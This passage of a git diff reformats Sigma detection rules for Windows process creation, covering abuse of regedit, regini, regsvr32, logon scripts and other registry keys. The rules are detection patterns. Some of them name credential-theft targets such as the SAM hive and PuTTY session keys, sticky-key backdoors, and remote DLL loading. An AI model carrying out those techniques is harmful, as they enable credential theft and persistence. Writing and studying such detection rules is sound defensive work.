@@ -22,18 +22,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regedit.exe - - OriginalFileName: REGEDIT.EXE + - NewProcessName|endswith: \regedit.exe + - OriginalFileName: REGEDIT.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /E ' - ' -E ' - filter_1: - CommandLine|contains: + filter_1: # filters to avoid intersection with critical keys rule + CommandLine|contains: - hklm - hkey_local_machine filter_2: - CommandLine|endswith: + CommandLine|endswith: - \system - \sam - \security diff --git a/sigma/builtin/process_creation/proc_creation_win_regedit_import_keys.yml b/sigma/builtin/process_creation/proc_creation_win_regedit_import_keys.yml index b41f5767b..e8fda82a8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regedit_import_keys.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regedit_import_keys.yml @@ -1,8 +1,8 @@ title: Imports Registry Key From a File id: 73bba97f-a82d-42ce-b315-9182e76c57b1 related: - - id: 0b80ade5-6997-4b1d-99a1-71701778ea61 - type: similar + - id: 0b80ade5-6997-4b1d-99a1-71701778ea61 + type: similar status: test description: Detects the import of the specified file to the registry with regedit.exe. references: @@ -22,15 +22,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regedit.exe - - OriginalFileName: REGEDIT.EXE + - NewProcessName|endswith: \regedit.exe + - OriginalFileName: REGEDIT.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /i ' - ' /s ' - .reg filter_1: - CommandLine|contains: + CommandLine|contains: - ' /e ' - ' /a ' - ' /c ' @@ -38,7 +38,7 @@ detection: - ' -a ' - ' -c ' filter_2: - CommandLine|re: :[^ \\] + CommandLine|re: :[^ \\] # to avoid intersection with ADS rule condition: process_creation and (all of selection_* and not all of filter_*) fields: - ParentProcessName diff --git a/sigma/builtin/process_creation/proc_creation_win_regedit_import_keys_ads.yml b/sigma/builtin/process_creation/proc_creation_win_regedit_import_keys_ads.yml index 0cb03690e..00f315d7f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regedit_import_keys_ads.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regedit_import_keys_ads.yml @@ -1,8 +1,8 @@ title: Imports Registry Key From an ADS id: 0b80ade5-6997-4b1d-99a1-71701778ea61 related: - - id: 73bba97f-a82d-42ce-b315-9182e76c57b1 - type: similar + - id: 73bba97f-a82d-42ce-b315-9182e76c57b1 + type: similar status: test description: Detects the import of a alternate datastream to the registry with regedit.exe. references: @@ -22,15 +22,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regedit.exe - - OriginalFileName: REGEDIT.EXE + - NewProcessName|endswith: \regedit.exe + - OriginalFileName: REGEDIT.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /i ' - .reg - CommandLine|re: :[^ \\] + CommandLine|re: :[^ \\] filter: - CommandLine|contains: + CommandLine|contains: - ' /e ' - ' /a ' - ' /c ' diff --git a/sigma/builtin/process_creation/proc_creation_win_regedit_trustedinstaller.yml b/sigma/builtin/process_creation/proc_creation_win_regedit_trustedinstaller.yml index c21846a4f..aff947aab 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regedit_trustedinstaller.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regedit_trustedinstaller.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \regedit.exe + NewProcessName|endswith: \regedit.exe ParentProcessName|endswith: - \TrustedInstaller.exe - \ProcessHacker.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_regini_ads.yml b/sigma/builtin/process_creation/proc_creation_win_regini_ads.yml index 4c7c424a0..e68823886 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regini_ads.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regini_ads.yml @@ -1,11 +1,10 @@ title: Suspicious Registry Modification From ADS Via Regini.EXE id: 77946e79-97f1-45a2-84b4-f37b5c0d8682 related: - - id: 5f60740a-f57b-4e76-82a1-15b6ff2cb134 - type: derived + - id: 5f60740a-f57b-4e76-82a1-15b6ff2cb134 + type: derived status: test -description: Detects the import of an alternate data stream with regini.exe, regini.exe - can be used to modify registry keys. +description: Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys. references: - https://lolbas-project.github.io/lolbas/Binaries/Regini/ - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f @@ -24,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regini.exe - - OriginalFileName: REGINI.EXE + - NewProcessName|endswith: \regini.exe + - OriginalFileName: REGINI.EXE selection_re: - CommandLine|re: :[^ \\] + CommandLine|re: :[^ \\] condition: process_creation and (all of selection_*) fields: - ParentProcessName diff --git a/sigma/builtin/process_creation/proc_creation_win_regini_execution.yml b/sigma/builtin/process_creation/proc_creation_win_regini_execution.yml index d2af9e4c9..0ced30d13 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regini_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regini_execution.yml @@ -1,11 +1,10 @@ title: Registry Modification Via Regini.EXE id: 5f60740a-f57b-4e76-82a1-15b6ff2cb134 related: - - id: 77946e79-97f1-45a2-84b4-f37b5c0d8682 - type: derived + - id: 77946e79-97f1-45a2-84b4-f37b5c0d8682 + type: derived status: test -description: Detects the execution of regini.exe which can be used to modify registry - keys, the changes are imported from one or more text files. +description: Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files. references: - https://lolbas-project.github.io/lolbas/Binaries/Regini/ - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f @@ -24,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \regini.exe - - OriginalFileName: REGINI.EXE + - NewProcessName|endswith: \regini.exe + - OriginalFileName: REGINI.EXE filter: - CommandLine|re: :[^ \\] + CommandLine|re: :[^ \\] # Covered in 77946e79-97f1-45a2-84b4-f37b5c0d8682 condition: process_creation and (selection and not filter) fields: - ParentProcessName diff --git a/sigma/builtin/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml b/sigma/builtin/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml index 35c45caec..5c91502a7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml +++ b/sigma/builtin/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml @@ -19,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - -path - dll - NewProcessName|endswith: \register-cimprovider.exe + NewProcessName|endswith: \register-cimprovider.exe condition: process_creation and selection fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml b/sigma/builtin/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml index cd714c376..03e96c7f0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml +++ b/sigma/builtin/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml @@ -1,11 +1,10 @@ title: Enumeration for 3rd Party Creds From CLI id: 87a476dc-0079-4583-a985-dee7a20a03de related: - - id: e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1 - type: derived + - id: e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1 + type: derived status: test -description: Detects processes that query known 3rd party registry keys that holds - credentials via commandline +description: Detects processes that query known 3rd party registry keys that holds credentials via commandline references: - https://isc.sans.edu/diary/More+Data+Exfiltration/25698 - https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt @@ -24,7 +23,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: # Add more paths as they are discovered - \Software\SimonTatham\PuTTY\Sessions - \Software\\SimonTatham\PuTTY\SshHostKeys\ - \Software\Mobatek\MobaXterm\ diff --git a/sigma/builtin/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml b/sigma/builtin/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml index 206c5ab28..705f9f757 100644 --- a/sigma/builtin/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml +++ b/sigma/builtin/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml @@ -1,15 +1,11 @@ title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI id: 10344bb3-7f65-46c2-b915-2d00d47be5b0 related: - - id: 3fd4c8d7-8362-4557-a8e6-83b29cc0d724 - type: similar + - id: 3fd4c8d7-8362-4557-a8e6-83b29cc0d724 + type: similar status: experimental -description: 'Detects changes to Internet Explorer''s (IE / Windows Internet properties) - ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My - Computer" zone. This allows downloaded files from the Internet to be granted the - same level of trust as files stored locally. - - ' +description: | + Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. references: - https://twitter.com/M_haggis/status/1699056847154725107 - https://twitter.com/JAMESWT_MHT/status/1699042827261391247 @@ -28,7 +24,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults - http - ' 0' diff --git a/sigma/builtin/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml b/sigma/builtin/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml index 16f7d1e34..e35e1f5e4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml +++ b/sigma/builtin/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml @@ -1,8 +1,7 @@ title: Suspicious Debugger Registration Cmdline id: ae215552-081e-44c7-805f-be16f975c8a2 status: test -description: Detects the registration of a debugger for a program that is available - in the logon screen (sticky key backdoor). +description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor). references: - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/ - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ @@ -21,9 +20,9 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: \CurrentVersion\Image File Execution Options\ + CommandLine|contains: \CurrentVersion\Image File Execution Options\ selection2: - CommandLine|contains: + CommandLine|contains: - sethc.exe - utilman.exe - osk.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_registry_logon_script.yml b/sigma/builtin/process_creation/proc_creation_win_registry_logon_script.yml index 60ec4c420..74b8a0f63 100644 --- a/sigma/builtin/process_creation/proc_creation_win_registry_logon_script.yml +++ b/sigma/builtin/process_creation/proc_creation_win_registry_logon_script.yml @@ -1,11 +1,10 @@ title: Potential Persistence Via Logon Scripts - CommandLine id: 21d856f9-9281-4ded-9377-51a1a6e2a432 related: - - id: 0a98a10c-685d-4ab0-bddc-b6bdd1d48458 - type: derived + - id: 0a98a10c-685d-4ab0-bddc-b6bdd1d48458 + type: derived status: experimental -description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" - for potential persistence +description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence references: - https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html author: Tom Ueltschi (@c_APT_ure) @@ -22,10 +21,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: UserInitMprLogonScript + CommandLine|contains: UserInitMprLogonScript condition: process_creation and selection falsepositives: - - Legitimate addition of Logon Scripts via the command line by administrators - or third party tools + - Legitimate addition of Logon Scripts via the command line by administrators or third party tools level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_registry_new_network_provider.yml b/sigma/builtin/process_creation/proc_creation_win_registry_new_network_provider.yml index f844b7896..5aae807f6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_registry_new_network_provider.yml +++ b/sigma/builtin/process_creation/proc_creation_win_registry_new_network_provider.yml @@ -1,11 +1,10 @@ title: Potential Credential Dumping Attempt Using New NetworkProvider - CLI id: baef1ec6-2ca9-47a3-97cc-4cf2bda10b77 related: - - id: 0442defa-b4a2-41c9-ae2c-ea7042fc4701 - type: similar + - id: 0442defa-b4a2-41c9-ae2c-ea7042fc4701 + type: similar status: test -description: Detects when an attacker tries to add a new network provider in order - to dump clear text credentials, similar to how the NPPSpy tool does it +description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it references: - https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy @@ -23,9 +22,15 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \System\CurrentControlSet\Services\ - \NetworkProvider + # filter: + # CommandLine|contains: + # - '\System\CurrentControlSet\Services\WebClient\NetworkProvider' + # - '\System\CurrentControlSet\Services\LanmanWorkstation\NetworkProvider' + # - '\System\CurrentControlSet\Services\RDPNP\NetworkProvider' + # - '\System\CurrentControlSet\Services\P9NP\NetworkProvider' # Related to WSL remove the comment if you use WSL in your ENV condition: process_creation and selection falsepositives: - Other legitimate network providers used and not filtred in this rule diff --git a/sigma/builtin/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml b/sigma/builtin/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml index 2516e7df4..10678ed20 100644 --- a/sigma/builtin/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml +++ b/sigma/builtin/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml @@ -1,8 +1,7 @@ title: Potential Privilege Escalation via Service Permissions Weakness id: 0f9c21f1-6a73-4b0e-9809-cb562cb8d981 status: test -description: Detect modification of services configuration (ImagePath, FailureCommand - and ServiceDLL) in registry by processes with Medium integrity level +description: Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://pentestlab.blog/2017/03/31/insecure-registry-permissions/ @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ControlSet - services - CommandLine|contains: + CommandLine|contains: - \ImagePath - \FailureCommand - \ServiceDll diff --git a/sigma/builtin/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml b/sigma/builtin/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml index 9316427ac..cf15bc5e6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml +++ b/sigma/builtin/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml @@ -1,15 +1,14 @@ title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 related: - - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c - type: similar - - id: f9999590-1f94-4a34-a91e-951e47bedefd - type: similar - - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 - type: similar + - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c # CLI Generic + type: similar + - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse + type: similar + - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry + type: similar status: experimental -description: Detects potential abuse of the provisioning registry key for indirect - command execution through "Provlaunch.exe". +description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". references: - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/ - https://twitter.com/0gtweet/status/1674399582162153472 @@ -26,7 +25,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: SOFTWARE\Microsoft\Provisioning\Commands\ + CommandLine|contains: SOFTWARE\Microsoft\Provisioning\Commands\ condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml b/sigma/builtin/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml index b4ffd5f65..95e334c11 100644 --- a/sigma/builtin/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml +++ b/sigma/builtin/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml @@ -1,15 +1,14 @@ title: Potential PowerShell Execution Policy Tampering - ProcCreation id: cf2e938e-9a3e-4fe8-a347-411642b28a9f related: - - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 - type: similar - - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 - type: similar - - id: 61d0475c-173f-4844-86f7-f3eebae1c66b - type: similar + - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 # ProcCreation Registry + type: similar + - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 # ProcCreation Cmdlet + type: similar + - id: 61d0475c-173f-4844-86f7-f3eebae1c66b # PowerShell ScriptBlock + type: similar status: test -description: Detects changes to the PowerShell execution policy registry key in order - to bypass signing requirements for script execution from the CommandLine +description: Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine references: - https://learn.microsoft.com/de-de/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3 author: Nasreddine Bencherchali (Nextron Systems) @@ -24,11 +23,11 @@ detection: EventID: 4688 Channel: Security selection_path: - CommandLine|contains: + CommandLine|contains: - \ShellIds\Microsoft.PowerShell\ExecutionPolicy - \Policies\Microsoft\Windows\PowerShell\ExecutionPolicy selection_values: - CommandLine|contains: + CommandLine|contains: - Bypass - RemoteSigned - Unrestricted diff --git a/sigma/builtin/process_creation/proc_creation_win_registry_typed_paths_persistence.yml b/sigma/builtin/process_creation/proc_creation_win_registry_typed_paths_persistence.yml index be6389f7b..b90810073 100644 --- a/sigma/builtin/process_creation/proc_creation_win_registry_typed_paths_persistence.yml +++ b/sigma/builtin/process_creation/proc_creation_win_registry_typed_paths_persistence.yml @@ -1,8 +1,7 @@ title: Persistence Via TypedPaths - CommandLine id: ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba status: test -description: Detects modification addition to the 'TypedPaths' key in the user or - admin registry via the commandline. Which might indicate persistence attempt +description: Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt references: - https://twitter.com/dez_/status/1560101453150257154 - https://forensafe.com/blogs/typedpaths.html @@ -18,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: \Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths + CommandLine|contains: \Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml b/sigma/builtin/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml index 13ebe3ef7..fcbabe525 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml @@ -1,8 +1,7 @@ title: Potential Regsvr32 Commandline Flag Anomaly id: b236190c-1c61-41e9-84b3-3fe03f6d76b0 status: test -description: Detects a potential command line flag anomaly related to "regsvr32" in - which the "/i" flag is used without the "/n" which should be uncommon. +description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon. references: - https://twitter.com/sbousseaden/status/1282441816986484737?s=12 author: Florian Roth (Nextron Systems) @@ -19,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' /i:' - ' -i:' - NewProcessName|endswith: \regsvr32.exe + NewProcessName|endswith: \regsvr32.exe filter_main_flag: - CommandLine|contains: + CommandLine|contains: - ' /n ' - ' -n ' condition: process_creation and (selection and not 1 of filter_main_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml b/sigma/builtin/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml index f1ba4697b..6dd0d3eb7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml @@ -1,8 +1,7 @@ title: Potentially Suspicious Regsvr32 HTTP IP Pattern id: 2dd2c217-bf68-437a-b57c-fe9fd01d5de8 status: experimental -description: Detects regsvr32 execution to download and install DLLs located remotely - where the address is an IP address. +description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address. references: - https://twitter.com/mrd0x/status/1461041276514623491 - https://twitter.com/tccontre18/status/1480950986650832903 @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - NewProcessName|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE selection_ip: - CommandLine|contains: + CommandLine|contains: - ' /i:http://1' - ' /i:http://2' - ' /i:http://3' diff --git a/sigma/builtin/process_creation/proc_creation_win_regsvr32_network_pattern.yml b/sigma/builtin/process_creation/proc_creation_win_regsvr32_network_pattern.yml index 799190bad..e2c76cae3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regsvr32_network_pattern.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regsvr32_network_pattern.yml @@ -1,11 +1,10 @@ title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern id: 867356ee-9352-41c9-a8f2-1be690d78216 related: - - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d - type: obsoletes + - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d + type: obsoletes status: experimental -description: Detects regsvr32 execution to download/install/register new DLLs that - are hosted on Web or FTP servers. +description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers. references: - https://twitter.com/mrd0x/status/1461041276514623491 - https://twitter.com/tccontre18/status/1480950986650832903 @@ -24,14 +23,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - NewProcessName|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE selection_flag: - CommandLine|contains: + CommandLine|contains: - ' /i' - ' -i' selection_protocol: - CommandLine|contains: + CommandLine|contains: - ftp - http condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_regsvr32_remote_share.yml b/sigma/builtin/process_creation/proc_creation_win_regsvr32_remote_share.yml index a92ecf685..f520210f5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regsvr32_remote_share.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regsvr32_remote_share.yml @@ -17,12 +17,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regsvr32.exe - - OriginalFileName: \REGSVR32.EXE + - NewProcessName|endswith: \regsvr32.exe + - OriginalFileName: \REGSVR32.EXE selection_cli: - CommandLine|contains: ' \\\\' + CommandLine|contains: ' \\\\' condition: process_creation and (all of selection_*) falsepositives: - Unknown +# Decrease to medium if this is something common in your org level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_child_process.yml index a8f46b98b..f2a3da2ef 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_child_process.yml @@ -1,8 +1,8 @@ title: Potentially Suspicious Child Process Of Regsvr32 id: 6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca related: - - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d - type: obsoletes + - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d + type: obsoletes status: experimental description: Detects potentially suspicious child processes of "regsvr32.exe". references: @@ -24,7 +24,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \regsvr32.exe - NewProcessName|endswith: + NewProcessName|endswith: - \calc.exe - \cscript.exe - \explorer.exe @@ -40,8 +40,8 @@ detection: - \werfault.exe - \wscript.exe filter_main_werfault: - CommandLine|contains: ' -u -p ' - NewProcessName|endswith: \werfault.exe + CommandLine|contains: ' -u -p ' + NewProcessName|endswith: \werfault.exe condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unlikely, but can rarely occur. Apply additional filters accordingly. diff --git a/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml b/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml index b2bd9fc12..411d67ae0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml @@ -1,11 +1,10 @@ title: Regsvr32 Execution From Potential Suspicious Location id: 9525dc73-0327-438c-8c04-13c0e037e9da related: - - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d - type: obsoletes + - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d + type: obsoletes status: experimental -description: Detects execution of regsvr32 where the DLL is located in a potentially - suspicious location. +description: Detects execution of regsvr32 where the DLL is located in a potentially suspicious location. references: - https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ @@ -22,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - NewProcessName|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - :\ProgramData\ - :\Temp\ - :\Users\Public\ @@ -34,7 +33,6 @@ detection: - \AppData\Roaming\ condition: process_creation and (all of selection_*) falsepositives: - - Some installers might execute "regsvr32" with DLLs located in %TEMP% or in %PROGRAMDATA%. - Apply additional filters if necessary. + - Some installers might execute "regsvr32" with DLLs located in %TEMP% or in %PROGRAMDATA%. Apply additional filters if necessary. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml b/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml index 01ca30d0d..c7cc55717 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml @@ -1,8 +1,7 @@ title: Regsvr32 Execution From Highly Suspicious Location id: 327ff235-94eb-4f06-b9de-aaee571324be status: experimental -description: Detects execution of regsvr32 where the DLL is located in a highly suspicious - locations +description: Detects execution of regsvr32 where the DLL is located in a highly suspicious locations references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -18,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - NewProcessName|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE selection_path_1: - CommandLine|contains: + CommandLine|contains: - :\PerfLogs\ - :\Temp\ - \Windows\Registration\CRMLog @@ -40,26 +39,28 @@ detection: - \Windows\Tasks\ - \Windows\Tracing\ selection_path_2: - CommandLine|contains: + CommandLine|contains: + # This is to avoid collisions with CLI starting with "C:\" - ' "C:\' - ' C:\' - - ' ''C:\' + - " 'C:\\" - D:\ selection_exclude_known_dirs: - CommandLine|contains: + CommandLine|contains: + # Note: add additional locations that are related to third party applications - C:\Program Files (x86)\ - C:\Program Files\ - C:\ProgramData\ - C:\Users\ + # Note: The space added here are to avoid collisions with the "regsvr32" binary full path - ' C:\Windows\' - ' "C:\Windows\' - - ' ''C:\Windows\' + - " 'C:\\Windows\\" filter_main_empty: - CommandLine: '' + CommandLine: '' filter_main_null: - CommandLine: null - condition: process_creation and (selection_img and (selection_path_1 or (selection_path_2 - and not selection_exclude_known_dirs)) and not 1 of filter_main_*) + CommandLine: + condition: process_creation and (selection_img and (selection_path_1 or (selection_path_2 and not selection_exclude_known_dirs)) and not 1 of filter_main_*) falsepositives: - Unlikely level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_extensions.yml b/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_extensions.yml index 44e1bfe62..b25c1c03a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_extensions.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regsvr32_susp_extensions.yml @@ -1,11 +1,10 @@ title: Regsvr32 DLL Execution With Suspicious File Extension id: 089fc3d2-71e8-4763-a8a5-c97fbb0a403e related: - - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d - type: obsoletes + - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d + type: obsoletes status: experimental -description: Detects the execution of REGSVR32.exe with DLL files masquerading as - other files +description: Detects the execution of REGSVR32.exe with DLL files masquerading as other files references: - https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/ - https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html @@ -24,10 +23,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - NewProcessName|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE selection_cli: - CommandLine|endswith: + CommandLine|endswith: + # Add more image extensions + # https://twitter.com/Max_Mal_/status/1542461200797163522/photo/3 - .bin - .bmp - .cr2 diff --git 